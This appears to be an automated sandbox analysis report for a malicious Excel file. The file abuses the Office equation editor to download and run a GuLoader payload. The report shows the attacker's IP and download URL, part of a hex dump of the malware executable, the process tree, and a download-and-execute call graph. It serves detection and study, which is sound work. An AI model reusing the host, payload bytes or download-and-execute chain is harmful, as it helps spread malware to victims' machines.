                  May 12, 2022 09:27:58.897173882 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.897185087 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.897197962 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.897212029 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.897223949 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.897236109 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.897252083 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.897268057 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.897281885 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.897310972 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.897367954 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.897375107 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.897380114 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.897383928 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.897907972 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.915276051 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.915318966 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.915342093 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.915363073 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.915385008 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.915405989 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.915489912 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.915512085 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.915533066 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.915535927 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.915554047 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.915575981 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.915584087 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.915596008 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.915599108 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.915620089 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.915638924 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.915641069 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.915664911 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.915713072 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.915738106 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.915759087 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.915781021 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.915803909 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.915806055 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.915826082 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.915832996 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.915848970 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.915863037 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.915868998 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.915889978 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.915890932 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.915935993 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.915955067 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.917907953 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:59.112030029 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:59.112095118 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:59.112138033 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:59.112179995 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:59.112219095 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:59.112261057 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:59.112301111 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:59.112338066 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:59.112591982 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:59.112648010 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:59.112658024 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:59.112663031 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:59.112668037 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:59.114722967 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:59.114767075 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:59.114804029 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:59.114845037 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:59.114883900 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:59.114923954 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:59.114929914 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:59.114984035 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:59.114989042 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:59.115025997 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:59.120239019 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:59.120284081 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:59.120326042 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:59.120363951 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:59.120404005 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:59.120443106 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:59.120445967 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:59.120505095 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:59.120518923 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:59.120563030 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:59.120563984 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:59.120600939 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:59.120604038 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:59.120644093 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:59.120646954 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:59.120688915 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:59.120687962 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:59.120732069 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:59.120733976 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:59.120770931 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:59.120770931 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:59.120814085 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:59.120852947 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:59.120857000 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:59.120897055 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:59.120938063 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:59.120943069 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:59.120978117 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:59.120980978 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:59.121016979 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:59.121018887 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:59.121057987 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:59.121062040 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:59.121100903 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:59.121134996 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:59.121140957 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:59.121148109 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:59.121182919 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:59.121184111 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:59.121222973 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:59.121264935 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:59.121301889 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:59.121305943 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:59.121341944 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:59.121345997 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:59.121381044 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:59.121448994 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:59.121457100 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:28:02.841547012 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:28:03.041457891 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:28:03.041631937 CEST4917380192.168.2.22103.149.13.182
                  • 103.149.13.182
                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.2249173103.149.13.18280C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  TimestampkBytes transferredDirectionData
                  May 12, 2022 09:27:57.325670004 CEST2OUTGET /msdrive10/.svchost.exe HTTP/1.1
                  Accept: */*
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                  Host: 103.149.13.182
                  Connection: Keep-Alive
                  May 12, 2022 09:27:57.549187899 CEST3INHTTP/1.1 200 OK
                  Date: Thu, 12 May 2022 07:27:56 GMT
                  Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
                  Last-Modified: Tue, 10 May 2022 23:41:34 GMT
                  ETag: "4fcbf-5deb0dd783b2f"
                  Accept-Ranges: bytes
                  Content-Length: 326847
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: application/x-msdownload
                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a8 21 60 47 ec 40 0e 14 ec 40 0e 14 ec 40 0e 14 2f 4f 51 14 ee 40 0e 14 ec 40 0f 14 49 40 0e 14 2f 4f 53 14 e3 40 0e 14 b8 63 3e 14 e0 40 0e 14 2b 46 08 14 ed 40 0e 14 52 69 63 68 ec 40 0e 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 68 9a 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 68 00 00 00 12 3a 00 00 08 00 00 0a 35 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 c0 3e 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 85 00 00 a0 00 00 00 00 60 3d 00 08 59 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 70 66 00 00 00 10 00 00 00 68 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9a 13 00 00 00 80 00 00 00 14 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 78 eb 39 00 00 a0 00 00 00 06 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 d0 02 00 00 90 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 08 59 01 00 00 60 3d 00 00 5a 01 00 00 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$!`G@@@/OQ@@I@/OS@c>@+F@Rich@PELhOah:5@>@`=Y.textpfh `.rdatal@@.datax9@.ndata:.rsrcY`=Z@@
                  May 12, 2022 09:27:57.549215078 CEST5INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 5c 83 7d 0c 0f 74 2b 83 7d 0c 46 8b 45 14 75 0d 83 48 18 10 8b 0d 68 8a 7a 00 89 48 04 50 ff 75 10 ff 75 0c ff 75 08 ff 15 84 82 40 00 e9 42 01 00 00 53 56 8b 35 70 8a 7a 00 8d 45 a4
                  Data Ascii: U\}t+}FEuHhzHPuuu@BSV5pzEWPu@eEEPu@}e`@FRVVU+MM3FQNUMVTUFPEEPM\@EEPEPu
                  May 12, 2022 09:27:57.549237013 CEST6INData Raw: 7a 00 e9 f9 16 00 00 8b 88 40 8b 7a 00 89 88 e0 8a 7a 00 e9 e8 16 00 00 8b 45 d8 8d 34 85 e0 8a 7a 00 33 c0 8b 0e 3b cb 0f 94 c0 23 4d dc 8b 44 85 d0 89 0e e9 d2 16 00 00 8b 45 d4 ff 34 85 e0 8a 7a 00 57 e9 31 16 00 00 8b 0d 30 7a 7a 00 8b 35 50
                  Data Ascii: z@zzE4z3;#MDE4zW10zz5P@;tuQEDzz;PQjuP@nmjPEH;tZj\V7Hf>ff;u9]tDtuIDuD;t=uu
                  May 12, 2022 09:27:57.549256086 CEST7INData Raw: 89 1f 66 89 9f fe 07 00 00 e9 b8 11 00 00 8b 75 e4 53 e8 09 13 00 00 6a 01 8b f8 89 55 f0 e8 fd 12 00 00 59 3b f3 59 89 55 f0 75 08 3b f8 7c 08 7e 8a eb 12 3b f8 73 08 8b 45 dc e9 91 11 00 00 0f 86 76 ff ff ff 8b 45 e0 e9 83 11 00 00 6a 01 e8 cb
                  Data Ascii: fuSjUY;YUu;|~;sEvEjjUuYUYE$L-@_+X;tSC#323;;u3;t;t3F;t3E
                  May 12, 2022 09:27:57.772262096 CEST9INData Raw: 00 ff 75 ac eb 47 53 e8 fc 0d 00 00 8b f0 56 6a eb e8 c8 35 00 00 56 e8 43 3b 00 00 8b f0 3b f3 0f 84 6a 09 00 00 39 5d d8 74 21 56 e8 c3 49 00 00 39 5d d4 7c 0b 50 ff 75 f4 e8 84 44 00 00 eb 0b 3b c3 74 07 c7 45 fc 01 00 00 00 56 ff 15 24 81 40
                  Data Ascii: uGSVj5VC;;j9]t!VI9]|PuD;tEV$@4jPMH;tvuMDvQEffjuMEQPjHEf;fEVj@8@;EjpHjEfHuEVSuU
                  May 12, 2022 09:27:57.772303104 CEST10INData Raw: 00 00 8d 44 00 02 83 fe 04 75 12 6a 03 e8 9a 08 00 00 59 a3 c8 b5 40 00 56 89 55 c8 58 83 fe 03 75 0f 68 00 18 00 00 57 53 ff 75 dc e8 ab 0d 00 00 50 57 ff 75 f0 53 ff 75 bc ff 75 08 ff 15 0c 80 40 00 85 c0 75 03 89 5d fc ff 75 08 e9 d3 00 00 00
                  Data Ascii: DujY@VUXuhWSuPWuSuu@u]uhj3i;fMEQMWQSPV@3Au.}t9Mt}uEEt739]WE>ffM^h>j;YUfn9]M
                  May 12, 2022 09:27:57.772331953 CEST12INData Raw: 08 e8 a4 36 00 00 57 ff 15 34 81 40 00 83 4d c8 ff 53 53 ff 75 08 ff 75 c8 e8 84 08 00 00 ff 75 08 8b f8 ff 15 24 81 40 00 6a f3 3b fb 5e 7d 13 6a ef 5e ff 75 c0 ff 15 70 81 40 00 c7 45 fc 01 00 00 00 56 e9 96 f8 ff ff 53 e8 23 03 00 00 8b f8 59
                  Data Ascii: 6W4@MSSuuu$@j;^}j^up@EVS#Y;=zUEi5z;|uVu:Q+MtjYUEuFP:NEM9]JW?S YU09]t"9]
                  May 12, 2022 09:27:57.772360086 CEST13INData Raw: c0 74 d0 ff 75 fc ff 15 10 80 40 00 6a 03 e8 88 39 00 00 85 c0 75 1e ff 75 0c ff 75 08 ff 15 18 80 40 00 eb 1b ff 75 fc ff 15 10 80 40 00 b8 eb 03 00 00 eb 0b 6a 00 56 ff 75 0c ff 75 08 ff d0 5f 5e 5b c9 c2 0c 00 55 8b ec 81 ec 80 00 00 00 81 7d
                  Data Ascii: tu@j9uuu@u@jVuu_^[U}ujhju@@E}uL6yy;rPjdQ@PEh@PT@EPuD@EPhuE+3V39t$ty;tP8@5y^95y
                  May 12, 2022 09:27:57.772386074 CEST14INData Raw: 1b 39 75 14 7d 03 8b 75 14 56 57 e8 16 00 00 00 85 c0 75 05 6a fd 58 eb 06 89 75 fc 8b 45 fc 5f 5e 5b c9 c2 10 00 ff 74 24 08 ff 74 24 08 ff 35 18 a0 40 00 e8 ce 2b 00 00 c2 08 00 6a 00 6a 00 ff 74 24 0c ff 35 18 a0 40 00 ff 15 60 81 40 00 c2 04
                  Data Ascii: 9u}uVWujXuE_^[t$t$5@+jjt$5@`@VX{V2Vu)u^V(V%VhP{1+^USVWj _3h]E@]@5@P]]u8Pf
                  May 12, 2022 09:27:57.772409916 CEST16INData Raw: 00 bf 08 f7 79 00 a1 70 8a 7a 00 ff b0 20 01 00 00 57 e8 80 2b 00 00 57 ff 15 70 81 40 00 39 5d fc 74 3e 6a 01 57 68 00 68 7b 00 ff 15 e4 80 40 00 85 c0 74 2c 53 57 e8 de 28 00 00 a1 70 8a 7a 00 ff b0 24 01 00 00 57 e8 4a 2b 00 00 57 e8 ea 20 00
                  Data Ascii: ypz W+Wp@9]t>jWhh{@t,SW(pz$WJ+W ;tP$@]fzMuSV(3@9]th u'!j@9ztvEPj(@P$@t/EPh0@S @SSESPSuEE@j7.;
                  May 12, 2022 09:27:57.772437096 CEST17INData Raw: 00 8d 51 0a 85 d2 75 12 66 81 fb ff ff 75 07 bb ff 03 00 00 eb a3 33 db eb 9f 89 15 3c 7a 7a 00 0f b7 01 50 57 e8 3d 25 00 00 e8 2f 00 00 00 a1 8c 8a 7a 00 8b 35 88 8a 7a 00 85 c0 74 1b 8b f8 8b 06 85 c0 74 0a 50 8d 46 18 50 e8 0d 26 00 00 81 c6
                  Data Ascii: Qufu3<zzPW=%/z5zttPFP&Ou_^][V`zzjV%V5(zD@^SUVt$$;WaU|$$3GujUUUUW5(z@\$,uBHP5(zP@jW@%


                  Click to jump to process

                  Click to jump to process

                  Click to dive into process behavior distribution

                  Click to jump to process

                  Target ID:0
                  Start time:09:28:13
                  Start date:12/05/2022
                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                  Imagebase:0x13fa20000
                  File size:28253536 bytes
                  MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:2
                  Start time:09:28:36
                  Start date:12/05/2022
                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Imagebase:0x400000
                  File size:543304 bytes
                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:4
                  Start time:09:28:43
                  Start date:12/05/2022
                  Path:C:\Users\Public\vbc.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\Public\vbc.exe"
                  Imagebase:0x400000
                  File size:326847 bytes
                  MD5 hash:D5E55A57372BCAD45FBB260105179CAF
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.1159273046.0000000003A50000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:low

                  Reset < >

                    Execution Graph

                    Execution Coverage:3.9%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:59%
                    Total number of Nodes:161
                    Total number of Limit Nodes:2
                    execution_graph 2210 3570356 2214 35701ea 2210->2214 2235 3570390 ExitProcess 2214->2235 2286 35703a9 2235->2286 2238 35703c5 18 API calls 2243 35703b6 2238->2243 2239 35703fe 2240 3570437 2241 357044f 11 API calls 2240->2241 2242 357043c 2241->2242 2245 35704ba 8 API calls 2242->2245 2249 3570460 URLDownloadToFileW 2242->2249 2243->2239 2243->2240 2243->2242 2246 35703e4 2243->2246 2245->2249 2246->2242 2247 35703e6 2246->2247 2251 3570420 15 API calls 2247->2251 2248 3570504 5 API calls 2250 35704f4 2248->2250 2249->2248 2252 357051b 3 API calls 2250->2252 2251->2239 2253 357050b 2252->2253 2254 357051a ShellExecuteExW 2253->2254 2256 357037e 2253->2256 2255 3570539 ExitProcess 2254->2255 2257 357052d 2254->2257 2255->2257 2259 35703c5 2256->2259 2257->2256 2258 357053c ExitProcess 2257->2258 2260 35703cb 2259->2260 2309 35703ec 2260->2309 2287 35703af 2286->2287 2288 35703c5 18 API calls 2287->2288 2293 35703b6 2287->2293 2288->2293 2289 35703fe 2290 3570437 2291 357044f 11 API calls 2290->2291 2292 357043c 2291->2292 2295 35704ba 8 API calls 2292->2295 2299 3570460 URLDownloadToFileW 2292->2299 2293->2289 2293->2290 2293->2292 2296 35703e4 2293->2296 2295->2299 2296->2292 2297 35703e6 2296->2297 2301 3570420 15 API calls 2297->2301 2298 3570504 5 API calls 2300 35704f4 2298->2300 2299->2298 2302 357051b 3 API calls 2300->2302 2301->2289 2303 357050b 2302->2303 2304 357051a ShellExecuteExW 2303->2304 2306 357039c 2303->2306 2305 3570539 ExitProcess 2304->2305 2307 357052d 2304->2307 2305->2307 2306->2238 2306->2243 2307->2306 2308 357053c ExitProcess 2307->2308 2310 35703ef 2309->2310 2311 3570420 15 API calls 2310->2311 2312 35703fe 2311->2312 2338 357001f 2339 3570024 2338->2339 2340 3570023 2338->2340 2342 35702f6 2340->2342 2345 35701ea 2342->2345 2343 3570390 25 API calls 2344 357037e 2343->2344 2346 35703c5 18 API calls 2344->2346 2345->2343 2351 35703b6 2346->2351 2347 35703fe 2348 3570437 2349 357044f 11 API calls 2348->2349 2350 357043c 2349->2350 2353 35704ba 8 API calls 2350->2353 2357 3570460 URLDownloadToFileW 2350->2357 2351->2347 2351->2348 2351->2350 2354 35703e4 2351->2354 2353->2357 2354->2350 2355 35703e6 2354->2355 2359 3570420 15 API calls 2355->2359 2356 3570504 5 API calls 2358 35704f4 2356->2358 2357->2356 2360 357051b 3 API calls 2358->2360 2359->2347 2361 357050b 2360->2361 2362 357051a ShellExecuteExW 2361->2362 2364 3570571 2361->2364 2363 3570539 ExitProcess 2362->2363 2365 357052d 2362->2365 2363->2365 2364->2340 2365->2364 2366 357053c ExitProcess 2365->2366 2145 3570540 GetPEB 2146 357054e 2145->2146 2645 357007f 2647 357005d 2645->2647 2646 3570070 2647->2646 2648 35702f6 28 API calls 2647->2648 2648->2647 2674 3570067 2675 357006c 2674->2675 2676 35702f6 28 API calls 2675->2676 2676->2675 2147 3570420 2148 3570422 2147->2148 2151 3570435 LoadLibraryW 2148->2151 2152 3570437 2151->2152 2169 357044f 2152->2169 2155 35704b1 URLDownloadToFileW 2183 3570504 2155->2183 2159 3570443 2200 35704ba URLDownloadToFileW 2159->2200 2164 357051a ShellExecuteExW 2165 357052d 2164->2165 2198 3570539 2164->2198 2167 3570427 2165->2167 2168 357053c ExitProcess 2165->2168 2170 3570452 2169->2170 2171 35704ba 8 API calls 2170->2171 2172 3570460 URLDownloadToFileW 2170->2172 2171->2172 2174 3570504 5 API calls 2172->2174 2175 35704f4 2174->2175 2176 357051b 3 API calls 2175->2176 2177 357050b 2176->2177 2178 357051a ShellExecuteExW 2177->2178 2180 357043c 2177->2180 2179 3570539 ExitProcess 2178->2179 2181 357052d 2178->2181 2179->2181 2180->2155 2180->2159 2181->2180 2182 357053c ExitProcess 2181->2182 2184 3570506 2183->2184 2185 357050b 2184->2185 2186 357051b 3 API calls 2184->2186 2187 357051a ShellExecuteExW 2185->2187 2189 35704f4 2185->2189 2186->2185 2188 3570539 ExitProcess 2187->2188 2190 357052d 2187->2190 2188->2190 2192 357051b 2189->2192 2190->2189 2191 357053c ExitProcess 2190->2191 2193 357051e ShellExecuteExW 2192->2193 2194 3570539 ExitProcess 2193->2194 2195 357052d 2194->2195 2196 357050b 2195->2196 2197 357053c ExitProcess 2195->2197 2196->2164 2196->2167 2199 357053c ExitProcess 2198->2199 2201 35704f4 2200->2201 2202 3570504 5 API calls 2200->2202 2203 357051b 3 API calls 2201->2203 2202->2201 2204 357050b 2203->2204 2205 357051a ShellExecuteExW 2204->2205 2207 3570460 2204->2207 2206 3570539 ExitProcess 2205->2206 2208 357052d 2205->2208 2206->2208 2207->2155 2208->2207 2209 357053c ExitProcess 2208->2209 2752 35701ec 2754 35701ea 2752->2754 2753 3570390 25 API calls 2755 357037e 2753->2755 2754->2753 2756 35703c5 18 API calls 2755->2756 2761 35703b6 2756->2761 2757 35703fe 2758 3570437 2759 357044f 11 API calls 2758->2759 2760 357043c 2759->2760 2763 35704ba 8 API calls 2760->2763 2767 3570460 URLDownloadToFileW 2760->2767 2761->2757 2761->2758 2761->2760 2764 35703e4 2761->2764 2763->2767 2764->2760 2765 35703e6 2764->2765 2769 3570420 15 API calls 2765->2769 2766 3570504 5 API calls 2768 35704f4 2766->2768 2767->2766 2770 357051b 3 API calls 2768->2770 2769->2757 2771 357050b 2770->2771 2772 357051a ShellExecuteExW 2771->2772 2774 3570571 2771->2774 2773 3570539 ExitProcess 2772->2773 2775 357052d 2772->2775 2773->2775 2775->2774 2776 357053c ExitProcess 2775->2776

                    Callgraph

                    • Executed
                    • Not Executed
                    • Opacity -> Relevance
                    • Disassembly available
